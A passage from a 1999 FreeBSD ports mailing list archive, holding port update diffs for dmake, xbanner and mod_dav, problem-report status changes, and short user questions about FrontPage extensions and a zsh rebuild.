lib/dmake/startup/templates/qssl -@dirrm lib/dmake/startup/templates/os2/ibm/icc -@dirrm lib/dmake/startup/templates/os2/ibm -@dirrm lib/dmake/startup/templates/os2 -@dirrm lib/dmake/startup/templates/msdos/microsft/msc60 -@dirrm lib/dmake/startup/templates/msdos/microsft/msc51 -@dirrm lib/dmake/startup/templates/msdos/microsft -@dirrm lib/dmake/startup/templates/msdos/borland/tcc20 -@dirrm lib/dmake/startup/templates/msdos/borland/bcc50 -@dirrm lib/dmake/startup/templates/msdos/borland/bcc45 -@dirrm lib/dmake/startup/templates/msdos/borland/bcc40 -@dirrm lib/dmake/startup/templates/msdos/borland/bcc30 -@dirrm lib/dmake/startup/templates/msdos/borland -@dirrm lib/dmake/startup/templates/msdos -@dirrm lib/dmake/startup/templates/mac -@dirrm lib/dmake/startup/templates -@dirrm lib/dmake/startup/qssl/qnx -@dirrm lib/dmake/startup/qssl -@dirrm lib/dmake/startup/os2/ibm -@dirrm lib/dmake/startup/os2 -@dirrm lib/dmake/startup/msdos/zortech -@dirrm lib/dmake/startup/msdos/microsft -@dirrm lib/dmake/startup/msdos/borland/tcc20 -@dirrm lib/dmake/startup/msdos/borland/bcc50.32 -@dirrm lib/dmake/startup/msdos/borland/bcc50 -@dirrm lib/dmake/startup/msdos/borland/bcc45 -@dirrm lib/dmake/startup/msdos/borland/bcc40 -@dirrm lib/dmake/startup/msdos/borland/bcc30 -@dirrm lib/dmake/startup/msdos/borland -@dirrm lib/dmake/startup/msdos -@dirrm lib/dmake/startup/mac -@dirrm lib/dmake/startup/Windows_NT/microsft -@dirrm lib/dmake/startup/Windows_NT/borland -@dirrm lib/dmake/startup/Windows_NT -@dirrm lib/dmake/startup -@dirrm lib/dmake +share/dmake/startup/templates/tos/template.mk +share/dmake/startup/templates/msdos/borland/bcc30/template.mk +share/dmake/startup/templates/msdos/borland/bcc40/template.mk +share/dmake/startup/templates/msdos/borland/bcc45/template.mk +share/dmake/startup/templates/msdos/borland/bcc50/template.mk +share/dmake/startup/templates/msdos/borland/tcc20/template.mk +share/dmake/startup/templates/msdos/microsft/msc51/template.mk +share/dmake/startup/templates/msdos/microsft/msc60/template.mk +share/dmake/startup/templates/os2/ibm/icc/template.mk +share/dmake/startup/templates/qssl/template.mk +share/dmake/startup/templates/mac/template.mk +share/dmake/startup/templates/unix/solaris/gnu/template.mk +share/dmake/startup/templates/unix/solaris/template.mk +share/dmake/startup/templates/unix/bsd43/uw/template.mk +share/dmake/startup/templates/unix/bsd43/vf/template.mk +share/dmake/startup/templates/unix/bsd43/template.mk +share/dmake/startup/templates/unix/coherent/ver40/template.mk +share/dmake/startup/templates/unix/coherent/ver42/template.mk +share/dmake/startup/templates/unix/linux/gnu/template.mk +share/dmake/startup/templates/unix/386ix/template.mk +share/dmake/startup/templates/unix/sysvr1/template.mk +share/dmake/startup/templates/unix/sysvr3/pwd/template.mk +share/dmake/startup/templates/unix/sysvr3/template.mk +share/dmake/startup/templates/unix/sysvr4/template.mk +share/dmake/startup/templates/unix/xenix/pwd/template.mk +share/dmake/startup/templates/unix/xenix/template.mk +share/dmake/startup/templates/win95/borland/bcc50/template.mk +share/dmake/startup/templates/win95/microsft/vpp40/template.mk +share/dmake/startup/templates/winnt/borland/bcc50/template.mk +share/dmake/startup/templates/winnt/microsft/vpp40/template.mk +share/dmake/startup/win95/borland/macros.mk +share/dmake/startup/win95/microsft/macros.mk +share/dmake/startup/win95/macros.mk +share/dmake/startup/win95/recipes.mk +share/dmake/startup/unix/386ix/macros.mk +share/dmake/startup/unix/bsd43/macros.mk +share/dmake/startup/unix/bsd43/recipes.mk +share/dmake/startup/unix/coherent/macros.mk +share/dmake/startup/unix/coherent/recipes.mk +share/dmake/startup/unix/linux/gnu/macros.mk +share/dmake/startup/unix/linux/macros.mk +share/dmake/startup/unix/sysvr3/gnu/macros.mk +share/dmake/startup/unix/sysvr3/macros.mk +share/dmake/startup/unix/sysvr4/macros.mk +share/dmake/startup/unix/solaris/macros.mk +share/dmake/startup/unix/sysvr1/macros.mk +share/dmake/startup/unix/xenix/macros.mk +share/dmake/startup/unix/recipes.mk +share/dmake/startup/unix/macros.mk +share/dmake/startup/tos/macros.mk +share/dmake/startup/os2/ibm/macros.mk +share/dmake/startup/os2/macros.mk +share/dmake/startup/winnt/borland/macros.mk +share/dmake/startup/winnt/microsft/macros.mk +share/dmake/startup/winnt/macros.mk +share/dmake/startup/winnt/recipes.mk +share/dmake/startup/mac/macros.mk +share/dmake/startup/msdos/borland/tcc20/macros.mk +share/dmake/startup/msdos/borland/bcc40/macros.mk +share/dmake/startup/msdos/borland/bcc45/macros.mk +share/dmake/startup/msdos/borland/bcc30/macros.mk +share/dmake/startup/msdos/borland/bcc50/macros.mk +share/dmake/startup/msdos/borland/bcc50.32/macros.mk +share/dmake/startup/msdos/borland/macros.mk +share/dmake/startup/msdos/microsft/macros.mk +share/dmake/startup/msdos/zortech/macros.mk +share/dmake/startup/msdos/macros.mk +share/dmake/startup/msdos/recipes.mk +share/dmake/startup/qssl/qnx/macros.mk +share/dmake/startup/qssl/qnx/recipes.mk +share/dmake/startup/qssl/macros.mk +share/dmake/startup/qssl/recipes.mk +share/dmake/startup/Windows_NT/borland/macros.mk +share/dmake/startup/Windows_NT/microsft/macros.mk +share/dmake/startup/Windows_NT/macros.mk +share/dmake/startup/Windows_NT/recipes.mk +share/dmake/startup/startup.mk +share/dmake/startup/summary +share/dmake/startup/config.mk +share/dmake/startup/template.mk +@dirrm share/dmake/startup/winnt/microsft +@dirrm share/dmake/startup/winnt/borland +@dirrm share/dmake/startup/winnt +@dirrm share/dmake/startup/win95/microsft +@dirrm share/dmake/startup/win95/borland +@dirrm share/dmake/startup/win95 +@dirrm share/dmake/startup/unix/xenix +@dirrm share/dmake/startup/unix/sysvr4 +@dirrm share/dmake/startup/unix/sysvr3/gnu +@dirrm share/dmake/startup/unix/sysvr3 +@dirrm share/dmake/startup/unix/sysvr1 +@dirrm share/dmake/startup/unix/solaris +@dirrm share/dmake/startup/unix/linux/gnu +@dirrm share/dmake/startup/unix/linux +@dirrm share/dmake/startup/unix/coherent +@dirrm share/dmake/startup/unix/bsd43 +@dirrm share/dmake/startup/unix/386ix +@dirrm share/dmake/startup/unix +@dirrm share/dmake/startup/tos +@dirrm share/dmake/startup/templates/winnt/microsft/vpp40 +@dirrm share/dmake/startup/templates/winnt/microsft +@dirrm share/dmake/startup/templates/winnt/borland/bcc50 +@dirrm share/dmake/startup/templates/winnt/borland +@dirrm share/dmake/startup/templates/winnt +@dirrm share/dmake/startup/templates/win95/microsft/vpp40 +@dirrm share/dmake/startup/templates/win95/microsft +@dirrm share/dmake/startup/templates/win95/borland/bcc50 +@dirrm share/dmake/startup/templates/win95/borland +@dirrm share/dmake/startup/templates/win95 +@dirrm share/dmake/startup/templates/unix/xenix/pwd +@dirrm share/dmake/startup/templates/unix/xenix +@dirrm share/dmake/startup/templates/unix/sysvr4 +@dirrm share/dmake/startup/templates/unix/sysvr3/pwd +@dirrm share/dmake/startup/templates/unix/sysvr3 +@dirrm share/dmake/startup/templates/unix/sysvr1 +@dirrm share/dmake/startup/templates/unix/solaris/gnu +@dirrm share/dmake/startup/templates/unix/solaris +@dirrm share/dmake/startup/templates/unix/linux/gnu +@dirrm share/dmake/startup/templates/unix/linux +@dirrm share/dmake/startup/templates/unix/coherent/ver42 +@dirrm share/dmake/startup/templates/unix/coherent/ver40 +@dirrm share/dmake/startup/templates/unix/coherent +@dirrm share/dmake/startup/templates/unix/bsd43/vf +@dirrm share/dmake/startup/templates/unix/bsd43/uw +@dirrm share/dmake/startup/templates/unix/bsd43 +@dirrm share/dmake/startup/templates/unix/386ix +@dirrm share/dmake/startup/templates/unix +@dirrm share/dmake/startup/templates/tos +@dirrm share/dmake/startup/templates/qssl +@dirrm share/dmake/startup/templates/os2/ibm/icc +@dirrm share/dmake/startup/templates/os2/ibm +@dirrm share/dmake/startup/templates/os2 +@dirrm share/dmake/startup/templates/msdos/microsft/msc60 +@dirrm share/dmake/startup/templates/msdos/microsft/msc51 +@dirrm share/dmake/startup/templates/msdos/microsft +@dirrm share/dmake/startup/templates/msdos/borland/tcc20 +@dirrm share/dmake/startup/templates/msdos/borland/bcc50 +@dirrm share/dmake/startup/templates/msdos/borland/bcc45 +@dirrm share/dmake/startup/templates/msdos/borland/bcc40 +@dirrm share/dmake/startup/templates/msdos/borland/bcc30 +@dirrm share/dmake/startup/templates/msdos/borland +@dirrm share/dmake/startup/templates/msdos +@dirrm share/dmake/startup/templates/mac +@dirrm share/dmake/startup/templates +@dirrm share/dmake/startup/qssl/qnx +@dirrm share/dmake/startup/qssl +@dirrm share/dmake/startup/os2/ibm +@dirrm share/dmake/startup/os2 +@dirrm share/dmake/startup/msdos/zortech +@dirrm share/dmake/startup/msdos/microsft +@dirrm share/dmake/startup/msdos/borland/tcc20 +@dirrm share/dmake/startup/msdos/borland/bcc50.32 +@dirrm share/dmake/startup/msdos/borland/bcc50 +@dirrm share/dmake/startup/msdos/borland/bcc45 +@dirrm share/dmake/startup/msdos/borland/bcc40 +@dirrm share/dmake/startup/msdos/borland/bcc30 +@dirrm share/dmake/startup/msdos/borland +@dirrm share/dmake/startup/msdos +@dirrm share/dmake/startup/mac +@dirrm share/dmake/startup/Windows_NT/microsft +@dirrm share/dmake/startup/Windows_NT/borland +@dirrm share/dmake/startup/Windows_NT +@dirrm share/dmake/startup +@dirrm share/dmake >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 12:10: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C61DE157CC for ; Fri, 17 Dec 1999 12:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA81965; Fri, 17 Dec 1999 12:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 40DCA14F6A; Fri, 17 Dec 1999 12:00:50 -0800 (PST) Message-Id: <19991217200050.40DCA14F6A@hub.freebsd.org> Date: Fri, 17 Dec 1999 12:00:50 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15539: Update port: x11/xbanner Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15539 >Category: ports >Synopsis: Update port: x11/xbanner >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 12:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Fixed MASTER_SITES * Modified patches to support CFLAGS/X11BASE properly * Modified patches to support install macros * Sorted pkg/PLIST * Added WWW: line into pkg/DESCR New file: patches/patch-ae >How-To-Repeat: >Fix: diff -urN /usr/ports/x11/xbanner/Makefile x11/xbanner/Makefile --- /usr/ports/x11/xbanner/Makefile Tue Aug 31 19:19:04 1999 +++ x11/xbanner/Makefile Sat Dec 18 02:59:38 1999 @@ -9,31 +9,32 @@ DISTNAME= XBanner1.31 PKGNAME= xbanner-1.31 CATEGORIES= x11 -MASTER_SITES= ftp://physics.fullerton.edu/pub/Linux/XBanner/ \ +MASTER_SITES= ftp://ftp.digital.com/pub/linux/XBanner/ \ ftp://ftp.uni-bielefeld.de/pub/systems/FreeBSD/lkoeller/ \ ${MASTER_SITE_SUNSITE} -MASTER_SITE_SUBDIR=X11/xutils +MASTER_SITE_SUBDIR= X11/xutils -MAINTAINER= ports@FreeBSD.org +MAINTAINER= ports@FreeBSD.org LIB_DEPENDS= Xpm.4:${PORTSDIR}/graphics/xpm USE_X_PREFIX= yes #USE_IMAKE= yes + post-patch: - ${MV} ${WRKSRC}/xres.c ${WRKSRC}/xres.c.input - ${SED} "s:%%X11BASE%%:${X11BASE}:" ${WRKSRC}/xres.c.input > ${WRKSRC}/xres.c - ${RM} -f ${WRKSRC}/xres.c.input + @${PERL} -pi -e 's|%%X11BASE%%|${X11BASE}|g' ${WRKSRC}/xres.c + @${PERL} -pi -e 's|%%X11BASE%%|${X11BASE}|g' ${WRKSRC}/samples/XBanner.ad post-install: - ${INSTALL_DATA} ${WRKSRC}/samples/XBanner.ad \ - $(X11BASE)/lib/X11/app-defaults/XBanner + ${INSTALL_DATA} ${WRKSRC}/samples/XBanner.ad \ + ${PREFIX}/lib/X11/app-defaults/XBanner .if !defined(NOPORTDOCS) - ${MKDIR} ${PREFIX}/share/doc/XBanner - $(CP) ${WRKSRC}/QuickStart ${PREFIX}/share/doc/XBanner - ${CP} ${WRKSRC}/docs/* ${PREFIX}/share/doc/XBanner - ${MKDIR} ${PREFIX}/share/examples/XBanner - $(CP) ${WRKSRC}/samples/_other_ideas/* ${PREFIX}/share/examples/XBanner + @${MKDIR} ${PREFIX}/share/doc/XBanner + ${INSTALL_DATA} ${WRKSRC}/QuickStart ${PREFIX}/share/doc/XBanner + ${INSTALL_DATA} ${WRKSRC}/docs/* ${PREFIX}/share/doc/XBanner + @${MKDIR} ${PREFIX}/share/examples/XBanner + ${INSTALL_DATA} ${WRKSRC}/samples/_other_ideas/* \ + ${PREFIX}/share/examples/XBanner .endif .include diff -urN /usr/ports/x11/xbanner/patches/patch-aa x11/xbanner/patches/patch-aa --- /usr/ports/x11/xbanner/patches/patch-aa Mon Jun 7 07:49:53 1999 +++ x11/xbanner/patches/patch-aa Sat Dec 18 03:26:05 1999 @@ -1,7 +1,7 @@ -*** Makefile.orig Mon May 12 17:55:59 1997 ---- Makefile Tue May 18 21:22:21 1999 +*** Makefile.orig Tue May 13 00:55:59 1997 +--- Makefile Sat Dec 18 03:25:54 1999 *************** -*** 6,30 **** +*** 6,27 **** .SUFFIXES: .c .o @@ -23,11 +23,8 @@ ! #INCDIR =-I/usr/X11R6/include # Library directories for the Ultrix (probably most Unixes) -! #XLIBDIR =/usr/lib/X11 - - # Comment out the following line if you do not have the XPM library. - XPM =-DHAS_XPM ---- 6,30 ---- + #XLIBDIR =/usr/lib/X11 +--- 6,27 ---- .SUFFIXES: .c .o @@ -49,10 +46,7 @@ ! INCDIR =-I$(X11BASE)/include # Library directories for the Ultrix (probably most Unixes) -! XLIBDIR =$(X11BASE)/lib - - # Comment out the following line if you do not have the XPM library. - XPM =-DHAS_XPM + #XLIBDIR =/usr/lib/X11 *************** *** 34,40 **** $(CC) $(INCDIR) $(CFLAGS) $(XPM) -c $*.c @@ -66,7 +60,7 @@ $(CC) $(INCDIR) $(CFLAGS) $(XPM) -c $*.c # Linux CFLAGS (actually generic gcc) -! CFLAGS+= -O2 +! #CFLAGS=-Wall -O2 # Want static binaries? #CFLAGS=-Wall -O2 -static @@ -85,7 +79,7 @@ # Just change it to wherever your libX11.a resides. ! LDFLAGS+=-L$(XLIBDIR) - all: xbanner freetemp random_effect xb_check + all: xbanner freetemp random_effect xb_check *************** *** 70,79 **** @@ -100,14 +94,14 @@ strip: exe strip xbanner freetemp xb_check random_effect --- 70,80 ---- - xb_check: xb_check.o - $(CC) $(CFLAGS) -o xb_check xb_check.o + xb_check: xb_check.o + $(CC) $(CFLAGS) -o xb_check xb_check.o -! install: freetemp xbanner xb_check random_effect -! $(INSTALL) -cs -g bin -m "0755" -o root freetemp $(BINDIR)/freetemp -! $(INSTALL) -cs -g bin -m "0755" -o root xbanner $(BINDIR)/xbanner -! $(INSTALL) -cs -g bin -m "0755" -o root xb_check $(BINDIR)/xb_check -! $(INSTALL) -cs -g bin -m "0755" -o root random_effect $(BINDIR)/random_effect +! install: freetemp xbanner xb_check random_effect +! ${BSD_INSTALL_PROGRAM} freetemp $(BINDIR)/freetemp +! ${BSD_INSTALL_PROGRAM} xbanner $(BINDIR)/xbanner +! ${BSD_INSTALL_PROGRAM} xb_check $(BINDIR)/xb_check +! ${BSD_INSTALL_PROGRAM} random_effect $(BINDIR)/random_effect strip: exe strip xbanner freetemp xb_check random_effect diff -urN /usr/ports/x11/xbanner/patches/patch-ae x11/xbanner/patches/patch-ae --- /usr/ports/x11/xbanner/patches/patch-ae Thu Jan 1 09:00:00 1970 +++ x11/xbanner/patches/patch-ae Sat Dec 18 01:50:36 1999 @@ -0,0 +1,19 @@ +*** samples/XBanner.ad.orig Tue May 13 00:55:58 1997 +--- samples/XBanner.ad Sat Dec 18 01:50:18 1999 +*************** +*** 96,102 **** + XBanner.BarSize: 12 + + ! Name of the pixmap file to tile over the root window +! !XBanner.BgPixFile: /usr/include/X11/pixmaps/xdm_bg.xpm + + ! The number of ripples for the Ripples BG style + XBanner.Ripples: 3 +--- 96,102 ---- + XBanner.BarSize: 12 + + ! Name of the pixmap file to tile over the root window +! !XBanner.BgPixFile: %%X11BASE%%/include/X11/pixmaps/xdm_bg.xpm + + ! The number of ripples for the Ripples BG style + XBanner.Ripples: 3 diff -urN /usr/ports/x11/xbanner/pkg/DESCR x11/xbanner/pkg/DESCR --- /usr/ports/x11/xbanner/pkg/DESCR Wed Jan 20 17:18:57 1999 +++ x11/xbanner/pkg/DESCR Sat Dec 18 01:20:59 1999 @@ -10,3 +10,5 @@ ISRAEL Email - amitm@netvision.net.il + +WWW: http://chaos.fullerton.edu/XBanner/ diff -urN /usr/ports/x11/xbanner/pkg/PLIST x11/xbanner/pkg/PLIST --- /usr/ports/x11/xbanner/pkg/PLIST Mon Jun 7 07:49:53 1999 +++ x11/xbanner/pkg/PLIST Sat Dec 18 01:14:07 1999 @@ -1,7 +1,7 @@ bin/freetemp -bin/xbanner -bin/xb_check bin/random_effect +bin/xb_check +bin/xbanner lib/X11/app-defaults/XBanner share/doc/XBanner/COPYING-2.0 share/doc/XBanner/Changes.txt @@ -25,5 +25,5 @@ share/examples/XBanner/FgGrad_Idea_2 share/examples/XBanner/Just_an_Idea share/examples/XBanner/My_Home_Setup.tar -@dirrm share/doc/XBanner @dirrm share/examples/XBanner +@dirrm share/doc/XBanner >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 12:16:18 1999 Delivered-To: freebsd-ports@freebsd.org Received: from sir-alan.chem.indiana.edu (sir-alan.chem.indiana.edu [129.79.137.215]) by hub.freebsd.org (Postfix) with ESMTP id BF62714BDE for ; Fri, 17 Dec 1999 12:16:16 -0800 (PST) (envelope-from msquires@sir-alan.chem.indiana.edu) Received: (from msquires@localhost) by sir-alan.chem.indiana.edu (8.9.3/8.9.3) id PAA70925; Fri, 17 Dec 1999 15:31:30 -0500 (EST) (envelope-from msquires) From: Mike Squires Message-Id: <199912172031.PAA70925@sir-alan.chem.indiana.edu> Subject: Re: Frontpage extensions In-Reply-To: <385A96A3.DE1CB433@gct-us.com> from Bill at "Dec 17, 1999 12:01:41 pm" To: Bill Date: Fri, 17 Dec 1999 15:31:30 -0500 (EST) Cc: FreeBSD ports X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Has anybody had any experience with installing the frontpage extensions > patch to apache. Any comments or warnings would be appreciated. We are > running FreeBSD 3.2 There is a update to the port now available on ftp.freebsd.org at ftp://www.westbend.net/pub/apache/ports or something fairly similar. This version installs apache 1.3.9 and FP2000 extensions, with an option of installing modSSL. In the latter case also get the rsaref patch just posted (should be listed in the FreeBSD security pages). There is also a doc on installing 1.3.9/FP2000/modSSL directly from sources. I have a copy at http://sir-alan.chem.indiana.edu/apache13-fp, along with a bit of info on installing the apache13-fp2k and -fp2k-modssl ports. This install does not use mod_frontpage.c, runs FP extensions using SUEXEC. Mike Squires To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 12:35:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A581514FB4; Fri, 17 Dec 1999 12:35:57 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA84239; Fri, 17 Dec 1999 12:35:57 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 12:35:57 -0800 (PST) From: Message-Id: <199912172035.MAA84239@freefall.freebsd.org> To: jblaufus@sendit.nodak.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15454: Error in lame-3.51 Makefile Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Error in lame-3.51 Makefile State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 12:35:08 PST 1999 State-Changed-Why: This one already appears to be fixed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 12:51:13 1999 Delivered-To: freebsd-ports@freebsd.org Received: from prserv.net (out2.prserv.net [165.87.194.229]) by hub.freebsd.org (Postfix) with ESMTP id 4CB5314CC7; Fri, 17 Dec 1999 12:51:07 -0800 (PST) (envelope-from jsachs@iclick.com) Received: from iclick.com ([166.72.10.16]) by prserv.net (out2) with SMTP id <1999121720510522900r7akue>; Fri, 17 Dec 1999 20:51:06 +0000 Message-ID: <385AA18A.D0AFFF6A@iclick.com> Date: Fri, 17 Dec 1999 15:48:10 -0500 From: Jay Sachs Organization: iClick, Inc. X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 3.4-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 Cc: stable@freebsd.org, ports@freebsd.org Subject: just-supped stable requires zsh-devel port rebuilt? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Not sure why. Unfortunately, those messages have scrolled into buffer obvlivion. They were to the effect that zsh couldn't autoload (or even find?) defintions of internal functions, like compctl and bindkey. This was during processing of my .zshrc file, and wasn't fatal to the shell. Nothing changed in the port since my last worldbuild (~ month ago), according to timestamps. The system CVSup-ped this AM, just made world, kernel and mergemastered and rebooted. Anyhow, rebuilding and installing the port cleared it up. jay To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 13:10: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C2A9E156EC for ; Fri, 17 Dec 1999 13:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA88056; Fri, 17 Dec 1999 13:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from modemcable156.106-200-24.mtl.mc.videotron.net (modemcable126.102-200-24.mtl.mc.videotron.net [24.200.102.126]) by hub.freebsd.org (Postfix) with SMTP id C063F14FB4 for ; Fri, 17 Dec 1999 13:02:43 -0800 (PST) (envelope-from patrick@jacuzzi.local.mindstep.com) Received: (qmail 69270 invoked by uid 1002); 17 Dec 1999 21:02:42 -0000 Message-Id: <19991217210242.69269.qmail@jacuzzi.local.mindstep.com> Date: 17 Dec 1999 21:02:42 -0000 From: patrick@jacuzzi.local.mindstep.com Reply-To: patrick@jacuzzi.local.mindstep.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15540: Update mod_dav to version 0.9.14 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15540 >Category: ports >Synopsis: Update mod_dav to version 0.9.14 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 13:10:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Patrick Bihan-Faou >Release: FreeBSD 3.2-STABLE i386 >Organization: MindStep Corporation >Environment: From the current ports distribution, (updated on december 13). >Description: The current mod_dav version in the ports is 0.9.12. The up-to-date version is 0.9.14 which fixes a lot of issues with the locking mechanisms. >How-To-Repeat: n/a >Fix: The following patch updates the version currently in the ports distribution. This PR supersedes PR# port/15241. BTW I am the port maintainer. Index: mindstep/projects/freebsd_pkg/mod_dav/Makefile diff -c mindstep/projects/freebsd_pkg/mod_dav/Makefile:1.1 mindstep/projects/freebsd_pkg/mod_dav/Makefile:1.3 *** mindstep/projects/freebsd_pkg/mod_dav/Makefile:1.1 Fri Dec 3 11:33:14 1999 --- mindstep/projects/freebsd_pkg/mod_dav/Makefile Fri Dec 17 15:50:11 1999 *************** *** 1,5 **** # New ports collection makefile for: mod_dav (apache) ! # Version required: 0.9.12 # Date created: Sun Oct 17, 1999 # Whom: patrick@mindstep.com # --- 1,5 ---- # New ports collection makefile for: mod_dav (apache) ! # Version required: 0.9.14 # Date created: Sun Oct 17, 1999 # Whom: patrick@mindstep.com # *************** *** 16,22 **** #BUILD_DEPENDS= ${PREFIX}/sbin/apxs:${PORTSDIR}/www/apache13 APACHE_VERSION= 1.3.6 ! DAV_VERSION= 0.9.12 HAS_CONFIGURE= yes CONFIGURE_ARGS= --prefix=${PREFIX} \ --- 16,22 ---- #BUILD_DEPENDS= ${PREFIX}/sbin/apxs:${PORTSDIR}/www/apache13 APACHE_VERSION= 1.3.6 ! DAV_VERSION= 0.9.14 HAS_CONFIGURE= yes CONFIGURE_ARGS= --prefix=${PREFIX} \ Index: mindstep/projects/freebsd_pkg/mod_dav/files/md5 diff -c mindstep/projects/freebsd_pkg/mod_dav/files/md5:1.1 mindstep/projects/freebsd_pkg/mod_dav/files/md5:1.3 *** mindstep/projects/freebsd_pkg/mod_dav/files/md5:1.1 Fri Dec 3 11:33:18 1999 --- mindstep/projects/freebsd_pkg/mod_dav/files/md5 Fri Dec 17 15:50:15 1999 *************** *** 1 **** ! MD5 (mod_dav-0.9.12-1.3.6.tar.gz) = bcad3b1b621de180acee9a6501696b4d --- 1 ---- ! MD5 (mod_dav-0.9.14-1.3.6.tar.gz) = 28b5e3554f6e59142282e0da90254070 >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 13:20: 3 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F3EFB15797 for ; Fri, 17 Dec 1999 13:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA88825; Fri, 17 Dec 1999 13:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 17 Dec 1999 13:20:01 -0800 (PST) Message-Id: <199912172120.NAA88825@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Patrick Bihan-Faou" Subject: Re: ports/15241: Update mod_dav to 0.9.13 Reply-To: "Patrick Bihan-Faou" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15241; it has been noted by GNATS. From: "Patrick Bihan-Faou" To: , Cc: Subject: Re: ports/15241: Update mod_dav to 0.9.13 Date: Fri, 17 Dec 1999 16:14:11 -0500 mod_dav has been updated to version 0.9.14. This PR should be closed since PR# ports/15540 includes the patch to upgrade the port to version 0.9.14 directly. Patrick. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 13:35:10 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3124D1575A; Fri, 17 Dec 1999 13:35:09 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA90119; Fri, 17 Dec 1999 13:35:08 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 17 Dec 1999 13:35:08 -0800 (PST) From: Message-Id: <199912172135.NAA90119@freefall.freebsd.org> To: patrick@jacuzzi.local.mindstep.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15241: Update mod_dav to 0.9.13 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update mod_dav to 0.9.13 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Fri Dec 17 13:34:51 PST 1999 State-Changed-Why: Superceded by ports/15540. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 17 14: 0: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 62581150B7 for ; Fri, 17 Dec 1999 14:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by 